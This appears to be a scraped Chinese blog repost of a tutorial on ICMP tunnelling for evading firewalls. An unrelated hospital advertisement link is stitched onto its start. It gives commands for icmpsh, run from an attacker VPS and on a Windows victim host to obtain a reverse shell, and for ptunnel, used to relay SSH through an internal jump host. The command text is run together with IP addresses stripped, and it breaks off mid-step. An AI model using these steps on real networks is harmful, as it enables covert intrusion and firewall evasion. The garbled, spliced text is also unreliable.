北京治疗白癜风技术好的医院 https://jbk.39.net/yiyuanzaixian/bjzkbdfyy/nxbdf/1、ICMP隧道的建立同样是建立在ICMP未被防火墙禁用的情况下使用的,就是PING命令,其原理就是在ICMP报文传输的时候,替换其中的Data部分的数据,并且对端通过一样的工具进行ICMP畸形包的处理。从而将恶意流量隐藏在ICMP数据包中,形成ICMP隧道。适用于被攻击主机可ping攻击机,可作为临时绕过防火墙。2、Icmpsh1、ICMPSH最大的优点是不需要太大的权限即可使用其使用环境拓扑图可能为这样,不过其他的协议(除IMCP外的协议)与端口都被中间看不见的FireWall所阻挡。2、我们在运行此程序时需要关闭自身的ICMP应答(可能需要另外下载一个python包)关闭应答:sysctl-wnet.ipv4.icmp_echo_ignore_all=1apt-getinstallpython-impacket3、然后在VPS攻击机上运行./icmpsh_m.pyVPS-IP内网出网口的公网地址(可能为内网防火墙的地址,可通过TcpDump监听ICMP,在受害主机上进行PINGVPS从而得知,两者要能互相PING通)例如:./icmpsh_m.py..49.138..49.、接着在内网受害主机下(windows)执行icmpsh.exe-tVPS_IP-d-s可直接获取shell5、总结:Icmpsh使用简单,通过imcp协议绕过防火墙对其他协议的阻拦。要求是两者能够相互ping通信,可直接反弹shell。3、ptunnel(kali自带)1、此工具虽然与ICMPSH一样都是使用ICMP协议进行通信的,但是不一样的是,ICMPSH常用于直接反弹shell,而ptunnel采用的是隧道中转,因此需要内网存在一个跳板机2、同样它需要把自身的ICMP响应关闭sysctl-wnet.ipv4.icmp_echo_ignore_all=13、这里构造一个拓扑如下4、在B主机(跳板服务器)和主机C装上Ptunnel(kali自带)5、B主机开启ptunnelC主机:ptunnel-p...-lp-da..44.-dp22-p:跳板机的ip-lp:自己监听的端口-da:内网目标的主机IP-dp:想连接的目标的端口C主机最后在ssh-p.0.0.1或者D主机ssh-p22...即可6、总结:ptunnel用于内网流量的中转,以ICMP协议为通道,起到一个内网跳板机的作用。4、IcmpTunnel,效果和ICMPSH差不多gitclone
转载请注明:http://www.aierlanlan.com/grrz/8934.html
